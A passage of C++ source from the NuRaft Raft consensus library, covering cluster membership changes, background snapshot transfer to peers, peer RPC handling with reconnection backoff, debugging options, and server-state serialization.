// refer to comment in `sync_log_to_new_srv()`
if (uncommitted_config_) {
p_in("uncommitted config exists at log %zu, prev log %zu",
uncommitted_config_->get_log_idx(),
uncommitted_config_->get_prev_log_idx());
cur_conf = uncommitted_config_;
}
ptr<cluster_config> new_conf = cs_new<cluster_config>
( log_store_->next_slot(),
cur_conf->get_log_idx() );
for ( cluster_config::const_srv_itor it = cur_conf->get_servers().begin();
it != cur_conf->get_servers().end();
++it ) {
if ((*it)->get_id() != srv_id) {
new_conf->get_servers().push_back(*it);
}
}
new_conf->set_user_ctx( cur_conf->get_user_ctx() );
new_conf->set_async_replication
( cur_conf->is_async_replication() );
p_in( "removed server %d from configuration and "
"save the configuration to log store at %llu",
srv_id,
new_conf->get_log_idx() );
config_changing_ = true;
uncommitted_config_ = new_conf;
ptr<buffer> new_conf_buf( new_conf->serialize() );
ptr<log_entry> entry( cs_new<log_entry>( state_->get_term(),
new_conf_buf,
log_val_type::conf ) );
store_log_entry(entry);
auto p_entry = peers_.find(srv_id);
if (p_entry != peers_.end()) {
ptr<peer> pp = p_entry->second;
srv_to_leave_ = pp;
srv_to_leave_target_idx_ = new_conf->get_log_idx();
p_in("set srv_to_leave_, "
"server %d will be removed from cluster, config %zu",
srv_id, srv_to_leave_target_idx_);
}
request_append_entries();
}
void raft_server::handle_join_leave_rpc_err(msg_type t_msg, ptr<peer> p) {
if (t_msg == msg_type::leave_cluster_request) {
p_in( "rpc failed for removing server (%d), "
"will remove this server directly",
p->get_id() );
/**
         * In case there are only two servers in the cluster,
         * it is safe to remove the server directly from peers,
         * as at most one config change can happen at a time.
         * Proof:
         *   Assume two config changes could happen at the same time.
         *   That would require a new leader to exist after the previous
         *   leader went offline, which is impossible: with only two
         *   servers in the cluster, no leader can be elected once one
         *   of them is offline.
         * So the bug
* https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E
* does not apply to cluster which only has two members
*/
if (peers_.size() == 1) {
peer_itor pit = peers_.find(p->get_id());
if (pit != peers_.end()) {
pit->second->enable_hb(false);
peers_.erase(pit);
p_in("server %d is removed from cluster", p->get_id());
} else {
p_in("peer %d cannot be found, no action for removing",
p->get_id());
}
if (srv_to_leave_) {
reset_srv_to_leave();
}
}
if (srv_to_leave_) {
// WARNING:
// If `srv_to_leave_` is already set, this function is probably
// invoked by `handle_hb_timeout`. In such a case, the server
// to be removed does not respond while the leader already
// generated the log for the configuration change. We should
// abandon the peer entry from `peers_`.
p_wn("srv_to_leave_ is already set to %d, will remove it from "
"peer list", srv_to_leave_->get_id());
remove_peer_from_peers(srv_to_leave_);
reset_srv_to_leave();
} else {
// Set `srv_to_leave_` and generate a log for configuration change.
rm_srv_from_cluster(p->get_id());
}
} else {
p_in( "rpc failed again for the new coming server (%d), "
"will stop retry for this server",
p->get_id() );
config_changing_ = false;
reset_srv_to_join();
}
}
void raft_server::reset_srv_to_join() {
clear_snapshot_sync_ctx(*srv_to_join_);
srv_to_join_->shutdown();
srv_to_join_.reset();
}
void raft_server::reset_srv_to_leave() {
srv_to_leave_->shutdown();
srv_to_leave_.reset();
srv_to_leave_target_idx_ = 0;
p_in("clearing srv_to_leave_");
}
} // namespace nuraft;
<|start_filename|>src/snapshot_sync_ctx.cxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-present eBay Inc.
Author/Developer(s): <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#include "snapshot_sync_ctx.hxx"
#include "event_awaiter.h"
#include "peer.hxx"
#include "raft_server.hxx"
#include "state_machine.hxx"
#include "tracer.hxx"
namespace nuraft {
class raft_server;
snapshot_sync_ctx::snapshot_sync_ctx(const ptr<snapshot>& s,
int peer_id,
ulong timeout_ms,
ulong offset)
: peer_id_(peer_id)
, snapshot_(s)
, offset_(offset)
, user_snp_ctx_(nullptr)
{
// 10 seconds by default.
timer_.set_duration_ms(timeout_ms);
}
void snapshot_sync_ctx::set_offset(ulong offset) {
if (offset_ != offset) timer_.reset();
offset_ = offset;
}
struct snapshot_io_mgr::io_queue_elem {
io_queue_elem( ptr<raft_server> r,
ptr<snapshot> s,
ptr<snapshot_sync_ctx> c,
ptr<peer> p,
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) >& h )
: raft_(r)
, snapshot_(s)
, sync_ctx_(c)
, dst_(p)
, handler_(h)
{}
ptr<raft_server> raft_;
ptr<snapshot> snapshot_;
ptr<snapshot_sync_ctx> sync_ctx_;
ptr<peer> dst_;
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) > handler_;
};
snapshot_io_mgr::snapshot_io_mgr()
: io_thread_ea_(new EventAwaiter())
, terminating_(false)
{
io_thread_ = std::thread(&snapshot_io_mgr::async_io_loop, this);
}
snapshot_io_mgr::~snapshot_io_mgr() {
shutdown();
}
bool snapshot_io_mgr::push(ptr<snapshot_io_mgr::io_queue_elem>& elem) {
auto_lock(queue_lock_);
logger* l_ = elem->raft_->l_.get();
    // If there is an existing one for the same peer, ignore it.
for (auto& entry: queue_) {
if ( entry->raft_ == elem->raft_ &&
entry->dst_->get_id() == elem->dst_->get_id() ) {
p_tr("snapshot request for peer %d already exists, do nothing",
elem->dst_->get_id());
return false;
}
}
queue_.push_back(elem);
p_tr("added snapshot request for peer %d", elem->dst_->get_id());
return true;
}
bool snapshot_io_mgr::push(ptr<raft_server> r,
ptr<peer> p,
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) >& h)
{
ptr<io_queue_elem> elem =
cs_new<io_queue_elem>( r,
p->get_snapshot_sync_ctx()->get_snapshot(),
p->get_snapshot_sync_ctx(),
p,
h );
return push(elem);
}
void snapshot_io_mgr::invoke() {
io_thread_ea_->invoke();
}
void snapshot_io_mgr::drop_reqs(raft_server* r) {
auto_lock(queue_lock_);
logger* l_ = r->l_.get();
auto entry = queue_.begin();
while (entry != queue_.end()) {
if ((*entry)->raft_.get() == r) {
p_tr("drop snapshot request for peer %d, raft server %p",
(*entry)->dst_->get_id(), r);
entry = queue_.erase(entry);
} else {
entry++;
}
}
}
bool snapshot_io_mgr::has_pending_request(raft_server* r, int srv_id) {
auto_lock(queue_lock_);
for (auto& entry: queue_) {
if ( entry->raft_.get() == r &&
entry->dst_->get_id() == srv_id ) {
return true;
}
}
return false;
}
void snapshot_io_mgr::shutdown() {
terminating_ = true;
if (io_thread_.joinable()) {
io_thread_ea_->invoke();
io_thread_.join();
}
}
void snapshot_io_mgr::async_io_loop() {
std::string thread_name = "nuraft_snp_io";
#ifdef __linux__
pthread_setname_np(pthread_self(), thread_name.c_str());
#elif __APPLE__
pthread_setname_np(thread_name.c_str());
#endif
do {
io_thread_ea_->wait_ms(1000);
io_thread_ea_->reset();
std::list< ptr<io_queue_elem> > reqs;
std::list< ptr<io_queue_elem> > reqs_to_return;
if (!terminating_) {
auto_lock(queue_lock_);
reqs = queue_;
}
for (ptr<io_queue_elem>& elem: reqs) {
if (terminating_) {
break;
}
if (!elem->raft_->is_leader()) {
break;
}
int dst_id = elem->dst_->get_id();
std::unique_lock<std::mutex> lock(elem->dst_->get_lock());
// ---- lock acquired
logger* l_ = elem->raft_->l_.get();
ulong obj_idx = elem->sync_ctx_->get_offset();
void*& user_snp_ctx = elem->sync_ctx_->get_user_snp_ctx();
p_db("peer: %d, obj_idx: %ld, user_snp_ctx %p\n",
dst_id, obj_idx, user_snp_ctx);
ulong snp_log_idx = elem->snapshot_->get_last_log_idx();
ulong snp_log_term = elem->snapshot_->get_last_log_term();
// ---- lock released
lock.unlock();
ptr<buffer> data = nullptr;
bool is_last_request = false;
int rc = elem->raft_->state_machine_->read_logical_snp_obj
( *elem->snapshot_, user_snp_ctx, obj_idx,
data, is_last_request );
if (rc < 0) {
// Snapshot read failed.
p_wn( "reading snapshot (idx %lu, term %lu, object %lu) "
"for peer %d failed: %d",
snp_log_idx, snp_log_term, obj_idx, dst_id, rc );
recur_lock(elem->raft_->lock_);
auto entry = elem->raft_->peers_.find(dst_id);
if (entry != elem->raft_->peers_.end()) {
// If normal member (already in the peer list):
// reset the `sync_ctx` so as to retry with the newer version.
elem->raft_->clear_snapshot_sync_ctx(*elem->dst_);
} else {
                // If it is the joining server (not in the peer list),
// enable HB temporarily to retry the request.
elem->raft_->srv_to_join_snp_retry_required_ = true;
elem->raft_->enable_hb_for_peer(*elem->raft_->srv_to_join_);
}
continue;
}
if (data) data->pos(0);
// Send snapshot message with the given response handler.
recur_lock(elem->raft_->lock_);
ulong term = elem->raft_->state_->get_term();
ulong commit_idx = elem->raft_->quick_commit_index_;
std::unique_ptr<snapshot_sync_req> sync_req(
new snapshot_sync_req( elem->snapshot_, obj_idx,
data, is_last_request ) );
ptr<req_msg> req( cs_new<req_msg>
( term,
msg_type::install_snapshot_request,
elem->raft_->id_,
dst_id,
elem->snapshot_->get_last_log_term(),
elem->snapshot_->get_last_log_idx(),
commit_idx ) );
req->log_entries().push_back( cs_new<log_entry>
( term,
sync_req->serialize(),
log_val_type::snp_sync_req ) );
if (elem->dst_->make_busy()) {
elem->dst_->set_rsv_msg(nullptr, nullptr);
elem->dst_->send_req(elem->dst_, req, elem->handler_);
elem->dst_->reset_ls_timer();
p_tr("bg thread sent message to peer %d", dst_id);
} else {
p_db("peer %d is busy, push the request back to queue", dst_id);
reqs_to_return.push_back(elem);
}
}
{
auto_lock(queue_lock_);
// Remove elements in `reqs` from `queue_`.
for (auto& entry: reqs) {
auto e2 = queue_.begin();
while (e2 != queue_.end()) {
if (*e2 == entry) {
e2 = queue_.erase(e2);
break;
} else {
e2++;
}
}
}
// Return elements in `reqs_to_return` to `queue_` for retrying.
for (auto& entry: reqs_to_return) {
queue_.push_back(entry);
}
}
} while (!terminating_);
}
}
<|start_filename|>include/libnuraft/snapshot_sync_ctx.hxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#ifndef _SNAPSHOT_SYNC_CTX_HXX_
#define _SNAPSHOT_SYNC_CTX_HXX_
#include "basic_types.hxx"
#include "event_awaiter.h"
#include "internal_timer.hxx"
#include "pp_util.hxx"
#include "ptr.hxx"
#include <functional>
#include <list>
#include <mutex>
#include <thread>
#include <unordered_map>
class EventAwaiter;
namespace nuraft {
class peer;
class raft_server;
class resp_msg;
class rpc_exception;
class snapshot;
class snapshot_sync_ctx {
public:
snapshot_sync_ctx(const ptr<snapshot>& s,
int peer_id,
ulong timeout_ms,
ulong offset = 0L);
__nocopy__(snapshot_sync_ctx);
public:
const ptr<snapshot>& get_snapshot() const { return snapshot_; }
ulong get_offset() const { return offset_; }
ulong get_obj_idx() const { return obj_idx_; }
void*& get_user_snp_ctx() { return user_snp_ctx_; }
void set_offset(ulong offset);
void set_obj_idx(ulong obj_idx) { obj_idx_ = obj_idx; }
void set_user_snp_ctx(void* _user_snp_ctx) { user_snp_ctx_ = _user_snp_ctx; }
timer_helper& get_timer() { return timer_; }
private:
void io_thread_loop();
/**
* Destination peer ID.
*/
int32_t peer_id_;
/**
* Pointer to snapshot.
*/
ptr<snapshot> snapshot_;
/**
* Current cursor of snapshot.
* Can be used for either byte offset or object index,
* but the legacy raw snapshot (offset_) is deprecated.
*/
union {
ulong offset_;
ulong obj_idx_;
};
/**
* User-defined snapshot context, given by the state machine.
*/
void* user_snp_ctx_;
/**
* Timer to check snapshot transfer timeout.
*/
timer_helper timer_;
};
// Singleton class.
class snapshot_io_mgr {
public:
static snapshot_io_mgr& instance() {
static snapshot_io_mgr mgr;
return mgr;
};
/**
* Push a snapshot read request to the queue.
*
* @param r Raft server instance.
* @param p Peer instance.
* @param h Response handler.
* @return `true` if succeeds (when there is no pending request for the same peer).
*/
bool push(ptr<raft_server> r,
ptr<peer> p,
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) >& h);
/**
* Invoke IO thread.
*/
void invoke();
/**
* Drop all pending requests belonging to the given Raft instance.
*
* @param r Raft server instance.
*/
void drop_reqs(raft_server* r);
/**
* Check if there is pending request for the given peer.
*
* @param r Raft server instance.
* @param srv_id Server ID to check.
* @return `true` if pending request exists.
*/
bool has_pending_request(raft_server* r, int srv_id);
/**
* Shutdown the global snapshot IO manager.
*/
void shutdown();
private:
struct io_queue_elem;
snapshot_io_mgr();
~snapshot_io_mgr();
void async_io_loop();
bool push(ptr<io_queue_elem>& elem);
/**
* A dedicated thread for reading snapshot object.
*/
std::thread io_thread_;
/**
* Event awaiter for `io_thread_`.
*/
ptr<EventAwaiter> io_thread_ea_;
/**
* `true` if we are closing this context.
*/
std::atomic<bool> terminating_;
/**
* Request queue. Allow only one request per peer at a time.
*/
std::list< ptr<io_queue_elem> > queue_;
/**
* Lock for `queue_`.
*/
std::mutex queue_lock_;
};
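// (Editorial sketch, not part of the original header.) Expected call pattern,
// assuming `server` (ptr<raft_server>), `dst_peer` (ptr<peer>) and `resp_handler`
// already exist in the caller; all three names are placeholders:
//
//   if (snapshot_io_mgr::instance().push(server, dst_peer, resp_handler)) {
//       snapshot_io_mgr::instance().invoke(); // wake the background IO thread
//   }
//
// `drop_reqs()` can be called when a raft_server shuts down so that its pending
// snapshot reads are discarded.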
}
#endif //_SNAPSHOT_SYNC_CTX_HXX_
<|start_filename|>src/peer.cxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#include "peer.hxx"
#include "debugging_options.hxx"
#include "tracer.hxx"
#include <unordered_set>
namespace nuraft {
void peer::send_req( ptr<peer> myself,
ptr<req_msg>& req,
rpc_handler& handler )
{
if (abandoned_) {
p_er("peer %d has been shut down, cannot send request",
config_->get_id());
return;
}
if (req) {
p_tr("send req %d -> %d, type %s",
req->get_src(),
req->get_dst(),
msg_type_to_string( req->get_type() ).c_str() );
}
ptr<rpc_result> pending = cs_new<rpc_result>(handler);
ptr<rpc_client> rpc_local = nullptr;
{ std::lock_guard<std::mutex> l(rpc_protector_);
if (!rpc_) {
// Nothing will be sent, immediately free it
// to serve next operation.
p_tr("rpc local is null");
set_free();
return;
}
rpc_local = rpc_;
}
rpc_handler h = (rpc_handler)std::bind
( &peer::handle_rpc_result,
this,
myself,
rpc_local,
req,
pending,
std::placeholders::_1,
std::placeholders::_2 );
if (rpc_local) {
rpc_local->send(req, h);
}
}
// WARNING:
// We should have the shared pointer of itself (`myself`)
// and pointer to RPC client (`my_rpc_client`),
// for the case when
// 1) this peer is removed before this callback function is invoked. OR
// 2) RPC client has been reset and re-connected.
void peer::handle_rpc_result( ptr<peer> myself,
ptr<rpc_client> my_rpc_client,
ptr<req_msg>& req,
ptr<rpc_result>& pending_result,
ptr<resp_msg>& resp,
ptr<rpc_exception>& err )
{
std::unordered_set<int> msg_types_to_free( {
msg_type::append_entries_request,
msg_type::install_snapshot_request,
msg_type::request_vote_request,
msg_type::pre_vote_request,
msg_type::leave_cluster_request,
msg_type::custom_notification_request,
msg_type::reconnect_request,
msg_type::priority_change_request
} );
if (abandoned_) {
p_in("peer %d has been shut down, ignore response.", config_->get_id());
return;
}
if (req) {
p_tr( "resp of req %d -> %d, type %s, %s",
req->get_src(),
req->get_dst(),
msg_type_to_string( req->get_type() ).c_str(),
(err) ? err->what() : "OK" );
}
if (err == nilptr) {
// Succeeded.
{ std::lock_guard<std::mutex> l(rpc_protector_);
// The same as below, freeing busy flag should be done
// only if the RPC hasn't been changed.
uint64_t cur_rpc_id = rpc_ ? rpc_->get_id() : 0;
uint64_t given_rpc_id = my_rpc_client ? my_rpc_client->get_id() : 0;
if (cur_rpc_id != given_rpc_id) {
p_wn( "[EDGE CASE] got stale RPC response from %d: "
"current %p (%zu), from parameter %p (%zu). "
"will ignore this response",
config_->get_id(),
rpc_.get(),
cur_rpc_id,
my_rpc_client.get(),
given_rpc_id );
return;
}
// WARNING:
// `set_free()` should be protected by `rpc_protector_`, otherwise
// it may free the peer even though new RPC client is already created.
if ( msg_types_to_free.find(req->get_type()) != msg_types_to_free.end() ) {
set_free();
}
}
reset_active_timer();
{
auto_lock(lock_);
resume_hb_speed();
}
ptr<rpc_exception> no_except;
resp->set_peer(myself);
pending_result->set_result(resp, no_except);
reconn_backoff_.reset();
reconn_backoff_.set_duration_ms(1);
} else {
// Failed.
// NOTE: Explicit failure is also treated as an activity
// of that connection.
reset_active_timer();
{
auto_lock(lock_);
slow_down_hb();
}
ptr<resp_msg> no_resp;
pending_result->set_result(no_resp, err);
// Destroy this connection, we MUST NOT re-use existing socket.
// Next append operation will create a new one.
{ std::lock_guard<std::mutex> l(rpc_protector_);
uint64_t cur_rpc_id = rpc_ ? rpc_->get_id() : 0;
uint64_t given_rpc_id = my_rpc_client ? my_rpc_client->get_id() : 0;
if (cur_rpc_id == given_rpc_id) {
rpc_.reset();
if ( msg_types_to_free.find(req->get_type()) !=
msg_types_to_free.end() ) {
set_free();
}
} else {
// WARNING (MONSTOR-9378):
// RPC client has been reset before this request returns
// error. Those two are different instances and we
// SHOULD NOT reset the new one.
p_wn( "[EDGE CASE] RPC for %d has been reset before "
"returning error: current %p (%zu), from parameter %p (%zu)",
config_->get_id(),
rpc_.get(),
cur_rpc_id,
my_rpc_client.get(),
given_rpc_id );
}
}
}
}
bool peer::recreate_rpc(ptr<srv_config>& config,
context& ctx)
{
if (abandoned_) {
p_tr("peer %d is abandoned", config->get_id());
return false;
}
ptr<rpc_client_factory> factory = nullptr;
{ std::lock_guard<std::mutex> l(ctx.ctx_lock_);
factory = ctx.rpc_cli_factory_;
}
if (!factory) {
p_tr("client factory is empty");
return false;
}
std::lock_guard<std::mutex> l(rpc_protector_);
bool backoff_timer_disabled =
debugging_options::get_instance()
.disable_reconn_backoff_.load(std::memory_order_relaxed);
if (backoff_timer_disabled) {
p_tr("reconnection back-off timer is disabled");
}
// To avoid too frequent reconnection attempt,
// we use exponential backoff (x2) from 1 ms to heartbeat interval.
if (backoff_timer_disabled || reconn_backoff_.timeout()) {
reconn_backoff_.reset();
size_t new_duration_ms = reconn_backoff_.get_duration_us() / 1000;
new_duration_ms = std::min( hb_interval_, (int32)new_duration_ms * 2 );
if (!new_duration_ms) new_duration_ms = 1;
reconn_backoff_.set_duration_ms(new_duration_ms);
rpc_ = factory->create_client(config->get_endpoint());
p_tr("%p reconnect peer %zu", rpc_.get(), config_->get_id());
// WARNING:
// A reconnection attempt should be treated as an activity,
// hence reset timer.
reset_active_timer();
set_free();
set_manual_free();
return true;
} else {
p_tr("skip reconnect this time");
}
return false;
}
void peer::shutdown() {
// Should set the flag to block all incoming requests.
abandoned_ = true;
// Cut off all shared pointers related to ASIO and Raft server.
scheduler_.reset();
{ // To guarantee atomic reset
// (race between send_req()).
std::lock_guard<std::mutex> l(rpc_protector_);
rpc_.reset();
}
hb_task_.reset();
}
} // namespace nuraft;
<|start_filename|>include/libnuraft/debugging_options.hxx<|end_filename|>
#pragma once
#include <atomic>
#include <cstdlib>
#include <cstddef>
namespace nuraft {
struct debugging_options {
debugging_options()
: disable_reconn_backoff_(false)
, handle_cli_req_sleep_us_(0)
{}
static debugging_options& get_instance() {
static debugging_options opt;
return opt;
}
/**
* If `true`, reconnection back-off timer will be disabled,
* and there will be frequent reconnection attempts for every
* request to follower.
*/
std::atomic<bool> disable_reconn_backoff_;
/**
* If non-zero, the thread will sleep the given amount of time
* inside `handle_cli_req` function.
*/
std::atomic<size_t> handle_cli_req_sleep_us_;
};
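// (Editorial sketch, not part of the original header.) Example of how a test
// might flip these knobs at runtime; the values used here are arbitrary.
inline void debugging_options_example() {
    // Disable the reconnection back-off so reconnect attempts are not throttled.
    debugging_options::get_instance()
        .disable_reconn_backoff_.store(true, std::memory_order_relaxed);

    // Inject a 500 us artificial delay into handle_cli_req().
    debugging_options::get_instance()
        .handle_cli_req_sleep_us_.store(500, std::memory_order_relaxed);
}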
}
<|start_filename|>include/libnuraft/srv_state.hxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#ifndef _SRV_STATE_HXX_
#define _SRV_STATE_HXX_
#include "basic_types.hxx"
#include "buffer.hxx"
#include "buffer_serializer.hxx"
#include <atomic>
#include <cassert>
#include <functional>
namespace nuraft {
class srv_state {
public:
srv_state()
: term_(0L)
, voted_for_(-1)
, election_timer_allowed_(true)
{}
srv_state(ulong term, int voted_for, bool et_allowed)
: term_(term)
, voted_for_(voted_for)
, election_timer_allowed_(et_allowed)
{}
/**
* Callback function type for increasing term.
*
* @param Current term.
* @return New term, it should be greater than current term.
*/
using inc_term_func = std::function< ulong(ulong) >;
__nocopy__(srv_state);
public:
static ptr<srv_state> deserialize(buffer& buf) {
if (buf.size() > sz_ulong + sz_int) {
return deserialize_v1p(buf);
}
// Backward compatibility.
return deserialize_v0(buf);
}
static ptr<srv_state> deserialize_v0(buffer& buf) {
ulong term = buf.get_ulong();
int voted_for = buf.get_int();
return cs_new<srv_state>(term, voted_for, true);
}
static ptr<srv_state> deserialize_v1p(buffer& buf) {
buffer_serializer bs(buf);
uint8_t ver = bs.get_u8();
(void)ver;
ulong term = bs.get_u64();
int voted_for = bs.get_i32();
bool et_allowed = (bs.get_u8() == 1);
return cs_new<srv_state>(term, voted_for, et_allowed);
}
void set_inc_term_func(inc_term_func to) {
inc_term_cb_ = to;
}
ulong get_term() const {
return term_;
}
void set_term(ulong term) {
term_ = term;
}
void inc_term() {
if (inc_term_cb_) {
ulong new_term = inc_term_cb_(term_);
assert(new_term > term_);
term_ = new_term;
return;
}
term_++;
}
int get_voted_for() const {
return voted_for_;
}
void set_voted_for(int voted_for) {
voted_for_ = voted_for;
}
bool is_election_timer_allowed() const {
return election_timer_allowed_;
}
void allow_election_timer(bool to) {
election_timer_allowed_ = to;
}
ptr<buffer> serialize() const {
return serialize_v1p(CURRENT_VERSION);
}
ptr<buffer> serialize_v0() const {
ptr<buffer> buf = buffer::alloc(sz_ulong + sz_int);
buf->put(term_);
buf->put(voted_for_);
buf->pos(0);
return buf;
}
ptr<buffer> serialize_v1p(size_t version) const {
// << Format >>
// version 1 byte
// term 8 bytes
// voted_for 4 bytes
// election timer 1 byte
ptr<buffer> buf = buffer::alloc( sizeof(uint8_t) +
sizeof(uint64_t) +
sizeof(int32_t) +
sizeof(uint8_t) );
buffer_serializer bs(buf);
bs.put_u8(version);
bs.put_u64(term_);
bs.put_i32(voted_for_);
bs.put_u8( election_timer_allowed_ ? 1 : 0 );
return buf;
}
private:
const uint8_t CURRENT_VERSION = 1;
/**
* Term.
*/
std::atomic<ulong> term_;
/**
* Server ID that this server voted for.
* `-1` if not voted.
*/
std::atomic<int> voted_for_;
/**
* `true` if election timer is allowed.
*/
std::atomic<bool> election_timer_allowed_;
/**
* Custom callback function for increasing term.
* If not given, term will be increased by 1.
*/
std::function< ulong(ulong) > inc_term_cb_;
};
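// (Editorial sketch, not part of the original header.) A minimal round-trip
// through the v1 on-disk layout described in serialize_v1p() above.
inline void srv_state_roundtrip_example() {
    srv_state st(/*term=*/7, /*voted_for=*/2, /*et_allowed=*/true);
    ptr<buffer> buf = st.serialize();              // ver(1) + term(8) + voted_for(4) + et(1)
    ptr<srv_state> restored = srv_state::deserialize(*buf);
    assert(restored->get_term() == 7);
    assert(restored->get_voted_for() == 2);
    assert(restored->is_election_timer_allowed());
}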
}
#endif
<|start_filename|>include/libnuraft/buffer_serializer.hxx<|end_filename|>
/************************************************************************
Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#pragma once
#include "pp_util.hxx"
#include "ptr.hxx"
#include <cstdint>
#include <string>
namespace nuraft {
class buffer;
class buffer_serializer {
public:
enum endianness {
LITTLE = 0x0,
BIG = 0x1,
};
buffer_serializer(buffer& src_buf,
endianness endian = LITTLE);
buffer_serializer(ptr<buffer>& src_buf_ptr,
endianness endian = LITTLE);
__nocopy__(buffer_serializer);
public:
/**
* Get the current position of cursor inside buffer.
*
* @return Position of cursor.
*/
inline size_t pos() const { return pos_; }
/**
* Get the size of given buffer.
*
* @return Size of buffer.
*/
size_t size() const;
/**
* Set the position of cursor.
*
     * @param new_pos New position.
*/
void pos(size_t new_pos);
/**
* Get the memory pointer to the current position.
*
* @return Pointer to the current position.
*/
void* data() const;
/**
* Put 1-byte unsigned integer.
*
* @param val 1-byte unsigned integer.
*/
void put_u8(uint8_t val);
/**
* Put 2-byte unsigned integer.
*
* @param val 2-byte unsigned integer.
*/
void put_u16(uint16_t val);
/**
* Put 4-byte unsigned integer.
*
* @param val 4-byte unsigned integer.
*/
void put_u32(uint32_t val);
/**
* Put 8-byte unsigned integer.
*
* @param val 8-byte unsigned integer.
*/
void put_u64(uint64_t val);
/**
* Put 1-byte signed integer.
*
* @param val 1-byte signed integer.
*/
void put_i8(int8_t val);
/**
* Put 2-byte signed integer.
*
* @param val 2-byte signed integer.
*/
void put_i16(int16_t val);
/**
* Put 4-byte signed integer.
*
* @param val 4-byte signed integer.
*/
void put_i32(int32_t val);
/**
* Put 8-byte signed integer.
*
* @param val 8-byte signed integer.
*/
void put_i64(int64_t val);
/**
* Put a byte array.
*
* WARNING:
* It does not put the given length info,
* so caller should know the length of byte array in advance
* before calling `get_raw(size_t)`.
*
* If not, please use `put_bytes(const void* raw_ptr, size_t len);`.
*
* @param raw_ptr Pointer to the byte array.
* @param len Length of the byte array.
*/
void put_raw(const void* raw_ptr, size_t len);
/**
* Put given buffer.
* If given buffer's position is not 0, only data
* after that position will be copied.
*
* WARNING:
* It does not put length info of given buffer,
* so caller should know the length of buffer in advance
* before calling `get_buffer(ptr<buffer>)`.
*
* If not, please use `put_bytes(const void* raw_ptr, size_t len);`.
*
* @param buf Buffer.
*/
void put_buffer(const buffer& buf);
/**
* Put a byte array.
* This function will put 4-byte length first, and then
* the actual byte array next.
*
* @param raw_ptr Pointer to the byte array.
* @param len Length of the byte array.
*/
void put_bytes(const void* raw_ptr, size_t len);
/**
* Put a string.
* This function will put 4-byte length first, and then
* the actual string next.
*
* @param str String.
*/
void put_str(const std::string& str);
/**
* Put a C-style string, which ends with NULL character.
*
* If you want to put generic binary,
* please use `put(const byte*, size_t)`.
*
* @param str String.
*/
void put_cstr(const char* str);
/**
* Get 1-byte unsigned integer.
*
     * @return 1-byte unsigned integer.
*/
uint8_t get_u8();
/**
* Get 2-byte unsigned integer.
*
     * @return 2-byte unsigned integer.
*/
uint16_t get_u16();
/**
* Get 4-byte unsigned integer.
*
     * @return 4-byte unsigned integer.
*/
uint32_t get_u32();
/**
* Get 8-byte unsigned integer.
*
     * @return 8-byte unsigned integer.
*/
uint64_t get_u64();
/**
* Get 1-byte signed integer.
*
     * @return 1-byte signed integer.
*/
int8_t get_i8();
/**
* Get 2-byte signed integer.
*
     * @return 2-byte signed integer.
*/
int16_t get_i16();
/**
* Get 4-byte signed integer.
*
     * @return 4-byte signed integer.
*/
int32_t get_i32();
/**
* Get 8-byte signed integer.
*
     * @return 8-byte signed integer.
*/
int64_t get_i64();
/**
* Read byte array of given size.
* It will NOT allocate a new memory, but return the
* reference to the memory inside buffer only.
*
* @param len Size to read.
* @return Pointer to the starting point of byte array.
*/
void* get_raw(size_t len);
/**
* Read byte array of given buffer's size,
* and copy it to the given buffer.
* If buffer's position is not zero, data will be copied
* starting from that position.
*
* @param dst Buffer where the data will be stored.
*/
void get_buffer(ptr<buffer>& dst);
/**
* Read 4-byte length followed by byte array, and then return them.
* It will NOT allocate a new memory, but return the
* reference to the memory inside buffer only.
*
* @param[out] len Size of returned byte array.
* @return Pointer to the starting point of byte array.
*/
void* get_bytes(size_t& len);
/**
* Read 4-byte length followed by string, and then return it
* as a string instance.
*
* @return String instance.
*/
std::string get_str();
/**
* Read C-style string (null terminated).
* It will NOT allocate a new memory, but return the
* reference to the memory inside buffer only.
*
* @return C-style string.
*/
const char* get_cstr();
private:
bool is_valid(size_t len) const;
// Endianness.
endianness endian_;
